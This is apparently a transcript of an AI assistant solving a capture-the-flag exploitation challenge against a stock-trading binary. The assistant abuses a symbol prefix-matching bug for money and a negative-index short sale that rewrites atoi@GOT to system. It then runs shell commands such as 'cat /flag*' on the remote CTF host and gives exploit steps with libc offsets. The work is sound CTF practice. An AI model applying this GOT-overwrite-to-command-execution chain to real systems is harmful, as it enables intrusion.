database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 73935 files and directories currently installed.) Preparing to unpack .../ubuntu-helper-virt-hwe_1%3a10.2.1+ds-1ubuntu4_all.deb ... Unpacking ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Selecting previously unselected package ubuntu-virt. Preparing to unpack .../ubuntu-virt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user. Preparing to unpack .../qemu-user_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user-binfmt. Preparing to unpack .../qemu-user-binfmt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ... Setting up ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Setting up ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Setting up qemu-user (1:10.2.1+ds-1ubuntu3) ... Setting up qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ... Processing triggers for systemd (259.5-0ubuntu3) ... - **Assistant:** Local qemu execution works now. I’m going to create a small scratch driver so I can automate candidate payloads and parse final money/crashes instead of doing manual `nc` sessions. - **Assistant:** - Market - 0. AAPL: 5152 shares at $665.03 1. GOOG: 3119 shares at $361.44 2. TSLA: 3887 shares at $287.15 3. ARMH: 10480 shares at $343.46 4. NVDA: 4794 shares at $111.94 5. MSFT: 10533 shares at $426.35 6. ATVI: 8658 shares at $442.65 7. CSCO: 6138 shares at $468.86 8. AMD: 2039 shares at $560.09 9. INTC: 4491 shares at $398.56 - [*] Stopped process '/usr/bin/qemu-aarch64' (pid 494) - **Assistant:** The trading logic alone can generate some money, but the OOB short path is still more interesting: its write lands on predictable global/GOT addresses for negative indices and on portfolio entries for indices above 99. I’m testing those cases locally now to see which ones pass the capacity check and what they corrupt. - **Assistant:** [x] Receiving all data [x] Receiving all data: 1B [x] Receiving all data: 49B [+] Receiving all data: Done (49B) [*] Process '/usr/bin/qemu-aarch64' stopped with exit code 0 (pid 565) Invalid choice. Final amount of money: 12889.92 - **Assistant:** [x] Receiving all data [x] Receiving all data: 1B [x] Receiving all data: 49B [+] Receiving all data: Done (49B) [*] Process '/usr/bin/qemu-aarch64' stopped with exit code 0 (pid 569) Invalid choice. Final amount of money: 13622.41 - **Assistant:** [x] Receiving all data [x] Receiving all data: 1B [x] Receiving all data: 364B [+] Receiving all data: Done (364B) [*] Stopped process '/usr/bin/qemu-aarch64' (pid 602) Transaction failed. Current portfolio: Money: $268.89 A: 1 shares AA: 1 shares AAP: 1 shares AAPL: 1 shares G: 1 shares GO: 1 shares GOO: 1 shares GOOG: 1 shares T: 1 shares TS: 1 shares TSL: 1 shares Shorting Capacity: $0.27 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: - **Assistant:** The key trading bug is in symbol matching rather than quantity: `find_user_stock()` treats the sell input as a prefix. If we buy `AM`/`AT` (AMD/ATVI) without ever buying `A`, then selling symbol `A` sells those shares at AAPL’s price. That gives a repeatable price-arbitrage loop when AAPL is above AMD or ATVI. - **Assistant:** - Market - 0. AAPL: 3489 shares at $4816.43 1. GOOG: 7116 shares at $5756.87 2. TSLA: 7299 shares at $6192.53 3. ARMH: 4129 shares at $6380.58 4. NVDA: 10248 shares at $6571.80 5. MSFT: 5649 shares at $3099.82 6. ATVI: 3686 shares at $5178.71 7. CSCO: 4851 shares at $4566.45 8. AMD: 2451 shares at $5739.64 9. INTC: 5395 shares at $5957.58 - [*] Stopped process '/usr/bin/qemu-aarch64' (pid 689) - **Assistant:** - Market - 0. AAPL: 7318 shares at $5103.42 1. GOOG: 6637 shares at $7784.51 2. TSLA: 4950 shares at $5030.71 3. ARMH: 3148 shares at $6981.81 4. NVDA: 3355 shares at $3357.10 5. MSFT: 7817 shares at $7318.92 6. ATVI: 9720 shares at $7103.64 7. CSCO: 10881 shares at $4586.97 8. AMD: 10001 shares at $3852.66 9. INTC: 4969 shares at $6274.04 - [*] Stopped process '/usr/bin/qemu-aarch64' (pid 702) - **Assistant:** Current portfolio: Money: $173521.93 Shorting Capacity: $173.52 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: [*] Stopped process '/usr/bin/qemu-aarch64' (pid 744) - **Assistant:** [*] cycle 4: money=25617.46, buy=AM, qty=19, ref_price=1297.87 [*] after cycle 4: money=38176.60 [*] cycle 5: money=38176.60, buy=AM, qty=28, ref_price=1329.66 [*] after cycle 5: money=38176.60 [*] cycle 6: money=38176.60, buy=AM, qty=21, ref_price=1788.14 [*] after cycle 6: money=54374.10 [*] cycle 7: money=54374.10, buy=AM, qty=28, ref_price=1908.85 [*] after cycle 7: money=88118.89 [*] cycle 8: money=88118.89, buy=AM, qty=45, ref_price=1927.57 [*] after cycle 8: money=88118.89 [*] cycle 9: money=88118.89, buy=AM, qty=34, ref_price=2514.66 [*] after cycle 9: money=88118.89 [*] cycle 10: money=88118.89, buy=AM, qty=29, ref_price=3009.56 [*] after cycle 10: money=88118.89 [*] cycle 11: money=88118.89, buy=AM, qty=27, ref_price=3178.12 [*] after cycle 11: money=108699.62 [*] cycle 12: money=108699.62, buy=AM, qty=30, ref_price=3553.77 [*] after cycle 12: money=131059.03 [*] cycle 13: money=131059.03, buy=AM, qty=29, ref_price=4480.75 [*] after cycle 13: money=122781.33 [*] cycle 14: money=122781.33, buy=AM, qty=28, ref_price=4352.45 [*] after cycle 14: money=119324.20 [*] cycle 15: money=119324.20, buy=AM, qty=27, ref_price=4395.53 [*] after cycle 15: money=120752.63 [*] cycle 16: money=120752.63, buy=AM, qty=26, ref_price=4545.21 [*] after cycle 16: money=134507.01 [*] cycle 17: money=134507.01, buy=AM, qty=29, ref_price=4532.53 [*] after cycle 17: money=155299.42 [*] sent GOT adjustment short [*] sending command: echo PWNED PWNED Invalid choice. Current portfolio: Money: $155299.42 Shorting Capacity: $155.30 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: [*] Stopped process '/usr/bin/qemu-aarch64' (pid 815) - **Assistant:** The full chain works locally: after compounding above $100k, shorting `-3` with quantity `-0xb5b4` adjusts the low dword of `atoi@GOT` to `system`, and the next menu input runs as a shell command. I’m running the same chain against the remote now; if the initial AAPL/AMD/ATVI spread is unfavorable I’ll reconnect. - **Assistant:** [x] Opening connection to armh.play.ctf.se on port 8888: Trying 13.60.76.107 [+] Opening connection to armh.play.ctf.se on port 8888: Done [*] arb using AM/AMD, ratio=3.37, prices={'AAPL': 819.98, 'GOOG': 249.87, 'TSLA': 474.34, 'ARMH': 41.44, 'NVDA': 349.3, 'MSFT': 297.33, 'ATVI': 321.06, 'CSCO': 346.28, 'AMD': 243.47, 'INTC': 471.11} [*] cycle 0: money=10000.00, buy=AM, qty=39, ref_price=243.47 [*] after cycle 0: money=44523.36 [*] cycle 1: money=44523.36, buy=AM, qty=119, ref_price=363.94 [*] after cycle 1: money=197644.26 [*] sent GOT adjustment short [*] sending command: cat /flag* flag* 2>/dev/null midnight{Stock_trading_is_harder_than_pwning$$$} Invalid choice. Current portfolio: Money: $197644.26 Shorting Capacity: $197.64 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: [*] Closed connection to armh.play.ctf.se port 8888 - **Assistant:** Solved. Flag: ```text midnight{Stock_trading_is_harder_than_pwning$$$} ``` Core exploit: 1. `find_stock()` and `find_user_stock()` use `memcmp(..., strlen(input))`, so symbols are prefix-matched. 2. Buy `AM` to buy AMD, then sell with symbol `A`. - `find_user_stock("A")` matches the held `AM` position. - `find_stock("A")` resolves to AAPL. - If AAPL > AMD, this compounds money quickly. 3. Once money is over `$100000`, short selling is enabled. 4. `short_sell()` allows a negative stock index. Using index `-3` targets `atoi@GOT`. 5. The supplied libc has: - `atoi = 0x3baf0` - `system = 0x470a4` - delta = `0xb5b4` 6. Shorting with quantity `-0xb5b4` changes `atoi@GOT` into `system`. 7. The next menu input becomes a shell command: ```sh cat /flag* flag* 2>/dev/null ``` I left the working exploit script at [solve_armh.py](/workspace/solve_armh.py). - **System:** Thread completed